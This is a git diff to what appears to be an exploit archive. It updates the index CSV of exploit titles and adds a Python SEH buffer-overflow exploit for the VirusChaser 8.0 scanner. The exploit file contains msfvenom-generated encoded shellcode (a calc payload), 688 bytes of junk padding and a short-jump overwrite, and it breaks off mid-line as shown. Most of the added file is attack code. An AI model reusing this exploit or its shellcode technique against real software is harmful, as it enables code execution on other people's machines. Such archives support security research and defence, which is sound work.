diff --git a/files.csv b/files.csv
index d91439d94..98e4d0ecc 100644
--- a/files.csv
+++ b/files.csv
@@ -269,7 +269,7 @@ id,file,description,date,author,platform,type,port
 1389,platforms/windows/dos/1389.html,"Microsoft Internet Explorer 6 - 'mshtml.dll datasrc' Denial of Service",2005-12-27,BuHa,windows,dos,0
 1390,platforms/multiple/dos/1390.c,"BZFlag 2.0.4 - (undelimited string) Denial of Service",2005-12-27,"Luigi Auriemma",multiple,dos,0
 1394,platforms/windows/dos/1394.html,"Microsoft Internet Explorer 6 - 'mshtml.dll div' Denial of Service",2005-12-29,rgod,windows,dos,0
-1396,platforms/windows/dos/1396.cpp,"Microsoft IIS - Malformed HTTP Request Denial of Service (cpp)",2005-12-29,Lympex,windows,dos,0
+1396,platforms/windows/dos/1396.cpp,"Microsoft IIS - Malformed HTTP Request Denial of Service",2005-12-29,Lympex,windows,dos,0
 1409,platforms/windows/dos/1409.pl,"BlueCoat WinProxy 6.0 R1c - GET Request Denial of Service",2006-01-07,FistFuXXer,windows,dos,0
 1411,platforms/hardware/dos/1411.pl,"Cisco IP Phone 7940 - (Reboot) Denial of Service",2006-01-10,kokanin,hardware,dos,0
 1416,platforms/windows/dos/1416.c,"HomeFtp 1.1 - (NLST) Denial of Service",2006-01-14,pi3ch,windows,dos,0
@@ -8918,6 +8918,7 @@ id,file,description,date,author,platform,type,port
 41710,platforms/windows/local/41710.rb,"HP Intelligent Management Center < 5.0 E0102 - UAM Buffer Overflow (Metasploit)",2012-08-29,Metasploit,windows,local,0
 41711,platforms/windows/local/41711.rb,"VMware Host Guest Client Redirector - DLL Side Loading (Metasploit)",2016-08-06,Metasploit,windows,local,0
 41712,platforms/windows/local/41712.rb,"CADA 3S CoDeSys Gateway Server - Directory Traversal (Metasploit)",2013-02-02,Metasploit,windows,local,0
+41887,platforms/windows/local/41887.txt,"VirusChaser 8.0 - Buffer Overflow (SEH)",2017-04-14,0x41Li,windows,local,0
 41886,platforms/linux/local/41886.c,"Linux Kernel 4.8.0 UDEV < 232 - Privilege Escalation",2017-04-15,"Nassim Asrir",linux,local,0
 41721,platforms/win_x86-64/local/41721.c,"Forticlient 5.2.3 (Windows 10 x64 Pre Anniversary) - Privilege Escalation",2017-03-25,sickness,win_x86-64,local,0
 41722,platforms/win_x86-64/local/41722.c,"Forticlient 5.2.3 (Windows 10 x64 Post Anniversary) - Privilege Escalation",2017-03-25,sickness,win_x86-64,local,0
diff --git a/platforms/windows/local/41887.txt b/platforms/windows/local/41887.txt
new file mode 100755
index 000000000..5b14fe5f3
--- /dev/null
+++ b/platforms/windows/local/41887.txt
@@ -0,0 +1,34 @@ +# Exploit Title: Virus Chaser 8.0 - Scanner component, SEH Overflow +# Date: 14 April 2017 +# Exploit Author: 0x41Li (0x41Li.D@gmail.com) +# Vendor Homepage: https://www.viruschaser.com/ +# Software Link: https://www.viruschaser.com/download/VC80b_32Setup.zip +# Tested on: Windows 7 (Universal) + +import os +from struct import pack + +## msfvenom -a x86 --platform Windows -p windows/exec cmd=calc -b '\x00\x0d\x0a\x09\x22' -f c # x86/shikata_ga_nai succeeded with size 216 ## BADCHARS = \x00\x0d\x0a\x09 AVOIDED = \x22 = " (Cut the buffer) +shellcode= ("\xbe\x7a\x1f\x2d\x97\xda\xd5\xd9\x74\x24\xf4\x5a\x33\xc9\xb1" + "\x30\x83\xc2\x04\x31\x72\x0f\x03\x72\x75\xfd\xd8\x6b\x61\x83" + "\x23\x94\x71\xe4\xaa\x71\x40\x24\xc8\xf2\xf2\x94\x9a\x57\xfe" + "\x5f\xce\x43\x75\x2d\xc7\x64\x3e\x98\x31\x4a\xbf\xb1\x02\xcd" + "\x43\xc8\x56\x2d\x7a\x03\xab\x2c\xbb\x7e\x46\x7c\x14\xf4\xf5" + "\x91\x11\x40\xc6\x1a\x69\x44\x4e\xfe\x39\x67\x7f\x51\x32\x3e" + "\x5f\x53\x97\x4a\xd6\x4b\xf4\x77\xa0\xe0\xce\x0c\x33\x21\x1f" + "\xec\x98\x0c\x90\x1f\xe0\x49\x16\xc0\x97\xa3\x65\x7d\xa0\x77" + "\x14\x59\x25\x6c\xbe\x2a\x9d\x48\x3f\xfe\x78\x1a\x33\x4b\x0e" + "\x44\x57\x4a\xc3\xfe\x63\xc7\xe2\xd0\xe2\x93\xc0\xf4\xaf\x40" + "\x68\xac\x15\x26\x95\xae\xf6\x97\x33\xa4\x1a\xc3\x49\xe7\x70" + "\x12\xdf\x9d\x36\x14\xdf\x9d\x66\x7d\xee\x16\xe9\xfa\xef\xfc" + "\x4e\xf4\xa5\x5d\xe6\x9d\x63\x34\xbb\xc3\x93\xe2\xff\xfd\x17" + "\x07\x7f\xfa\x08\x62\x7a\x46\x8f\x9e\xf6\xd7\x7a\xa1\xa5\xd8" + "\xae\xc2\x28\x4b\x32\x05") + +junk = "A"*688 +jmp ="\xeb\x0b\x41\x41" ## JMP 0B +ret = pack('